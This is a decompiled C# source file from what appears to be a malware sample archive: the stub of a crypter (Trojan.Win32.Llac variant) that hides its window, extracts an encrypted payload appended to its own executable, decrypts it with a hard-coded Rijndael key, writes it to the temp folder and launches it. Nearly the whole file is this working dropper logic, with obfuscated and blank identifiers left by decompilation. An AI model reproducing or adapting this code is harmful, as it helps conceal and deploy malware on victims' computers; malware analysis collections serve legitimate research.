MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.cqas-7b1e23881a8ecad479bf21b176cf0d45377cb7306820490a17e1470826acc586/Form1.cs

149 lines
4.6 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: U_Stub.Form1
// Assembly: U-Stub, Version=0.5.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1A3D191F-9017-4B28-BB6C-EB744F26B6E8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.cqas-7b1e23881a8ecad479bf21b176cf0d45377cb7306820490a17e1470826acc586.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace U_Stub
{
[DesignerGenerated]
public class Form1 : Form
{
private static List<WeakReference> = new List<WeakReference>();
private IContainer \u0034AAAA;
private Label \u0035AAA0;
private string \u0036AAAA;
private string \u0037AAA0;
[DebuggerNonUserCode]
static Form1()
{
}
public Form1()
{
this.Load += new EventHandler(this.);
lock (Form1.)
Form1..Add(new WeakReference((object) this));
this.\u0037AAA0 = Path.GetTempPath();
this.();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.\u0034AAAA == null)
return;
this.\u0034AAAA.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void ()
{
this.Label1 = new Label();
this.SuspendLayout();
this.Label1.AutoSize = true;
this.Label1.Font = new Font("Microsoft Sans Serif", 36f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.Label1.ForeColor = Color.Black;
this.Label1.Location = new Point(12, 9);
this.Label1.Name = "Label1";
Label label1 = this.Label1;
Size size1 = new Size(94, 55);
Size size2 = size1;
label1.Size = size2;
this.Label1.TabIndex = 0;
this.Label1.Text = "0.5";
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(115, 72);
this.ClientSize = size1;
this.Controls.Add((Control) this.Label1);
this.Name = nameof (Form1);
this.Text = "S-";
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual Label Label1
{
[DebuggerNonUserCode] get => this.\u0035AAA0;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this.\u0035AAA0 = value;
}
private void (object , EventArgs _param2)
{
try
{
this.Visible = false;
this.Hide();
string Delimiter = "1337";
string password = "hUgo@Underground-Economy.biz";
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared);
this.\u0036AAAA = Strings.Space(checked ((int) FileSystem.LOF(1)));
FileSystem.FileGet(1, ref this.\u0036AAAA);
FileSystem.FileClose(1);
string s = Strings.Split(this.\u0036AAAA, Delimiter)[1];
RijndaelManaged rijndaelManaged = new RijndaelManaged();
byte[] salt = new byte[8]
{
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7,
(byte) 8
};
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(password, salt);
rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.Key.Length);
rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.IV.Length);
MemoryStream memoryStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged.CreateDecryptor(), CryptoStreamMode.Write);
try
{
byte[] buffer = Convert.FromBase64String(s);
cryptoStream.Write(buffer, 0, buffer.Length);
cryptoStream.Close();
s = Encoding.UTF8.GetString(memoryStream.ToArray());
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
FileSystem.FileOpen(1, this.\u0037AAA0 + "\\fIl31.exe", OpenMode.Binary);
FileSystem.FilePut(1, s, -1L, false);
FileSystem.FileClose(1);
Interaction.Shell(this.\u0037AAA0 + "\\fIl31.exe", AppWinStyle.NormalFocus);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
this.Close();
}
}
}